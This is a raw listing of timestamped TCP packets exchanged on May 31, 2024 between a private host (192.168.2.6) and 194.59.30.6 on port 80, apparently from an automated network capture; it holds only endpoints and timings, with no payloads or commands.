                              May 31, 2024 08:09:06.740648985 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.740686893 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740704060 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740714073 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740725040 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740736008 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740746975 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740750074 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.740772009 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.740874052 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740884066 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740894079 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740921021 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.740932941 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.740946054 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741003990 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741043091 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741136074 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741147995 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741158009 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741168022 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741178989 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741199970 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741224051 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741229057 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741246939 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741256952 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741266012 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741285086 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741297007 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741338015 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741375923 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741414070 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741425991 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741437912 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741461039 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741486073 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741581917 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741592884 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741604090 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741614103 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741626978 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741628885 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741676092 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741736889 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741781950 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741785049 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741794109 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741805077 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741827011 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741828918 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741838932 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741864920 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741894007 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741913080 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741925001 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741928101 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.741933107 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741935015 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.741975069 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.746556044 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.746575117 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.746584892 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.746627092 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.746633053 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.746644974 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.746696949 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:11.454436064 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:11.454559088 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.152048111 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.157242060 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.157354116 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.158371925 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.163202047 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811597109 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811613083 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811656952 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811671972 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811685085 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811697960 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.811768055 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.811768055 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.811768055 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.811768055 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898271084 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898292065 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898396969 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898405075 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898396969 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898446083 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898461103 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898473978 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898495913 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.898502111 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898533106 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898554087 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.898981094 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.899152994 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.906083107 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.906095982 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.906116009 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.906130075 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.906177998 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.906208038 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.984647036 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984663010 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984746933 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984765053 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984802961 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984813929 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984824896 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.984834909 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.984834909 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.984836102 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.984926939 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.984927893 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.985626936 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.985704899 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.992767096 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992779016 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992836952 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.992892027 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992913008 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992924929 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992935896 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992944956 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.992947102 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.992993116 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.992993116 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:35.993760109 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:35.993818998 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071297884 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071351051 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071387053 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071387053 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071542025 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071568966 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071578979 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071608067 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071608067 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071610928 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071641922 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071644068 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.071674109 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.071703911 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.072283030 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072298050 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072305918 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072340012 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.072370052 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.072695017 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072705984 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072715044 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072724104 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.072755098 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.072783947 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079380989 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079405069 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079420090 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079427958 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079432964 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079487085 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079556942 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079735994 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079755068 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079767942 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079785109 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079824924 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079824924 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079824924 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079850912 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079862118 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.079890013 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.079920053 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165472984 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165504932 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165515900 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165539026 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165555000 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165551901 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165565968 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165575981 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165585995 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165597916 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165607929 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165613890 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165613890 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165620089 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165632010 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.165638924 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165661097 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.165678978 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.166750908 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166784048 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166838884 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166840076 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.166851997 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166874886 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166901112 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166906118 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.166910887 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166927099 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.166953087 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.166960001 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166970968 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166980028 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.166991949 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.167018890 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.167047024 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.168307066 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168375969 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168385983 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168404102 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168418884 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168430090 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168431997 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.168459892 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.168515921 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.168895960 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.168951988 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.168977976 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.169028997 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.169054031 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.169085026 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.169109106 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.169133902 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.244680882 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.244754076 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.244770050 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.244810104 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.244857073 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.244887114 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.244916916 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.244937897 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.244957924 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245003939 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245038986 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245062113 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245090961 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245121002 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245141029 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245167971 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245199919 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245220900 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245254040 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245273113 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245306969 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245328903 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245364904 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245524883 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245579958 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245599031 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245623112 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245666981 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245699883 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245738983 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245738983 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245778084 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245810032 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245831966 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245851040 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.245879889 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245914936 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.245965004 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.246320963 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.246356010 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.246387959 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.246409893 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.246474981 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254298925 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254331112 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254365921 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254390001 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254410028 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254456043 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254487991 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254508972 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254539013 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254560947 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254595041 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254651070 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254774094 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254806995 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254827023 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254848003 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254884005 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254916906 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.254935980 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254962921 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.254987001 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255017996 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255040884 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255068064 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255091906 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255127907 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255148888 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255171061 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255417109 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255475998 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255526066 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255558014 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255594969 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255594969 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.255639076 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.255686998 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.260751009 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.260807991 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.260826111 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.260859013 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.260883093 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.260909081 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.260931969 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.260967016 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.260997057 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.261015892 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331413984 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331451893 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331500053 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331525087 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331561089 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331583023 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331631899 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331654072 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331676006 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331706047 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331737995 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331759930 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331782103 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331811905 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331840038 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331876993 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331897020 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.331943989 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.331975937 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332010031 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332030058 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332055092 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332079887 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332113028 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332142115 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332159042 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332272053 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332323074 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332380056 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332411051 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332429886 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332461119 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332525015 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332539082 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332577944 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332592010 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332623005 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332643986 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332667112 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332695961 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332729101 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332779884 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333201885 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333252907 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333276987 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333308935 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333340883 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333360910 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333388090 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333421946 CEST8051544194.59.30.6192.168.2.6
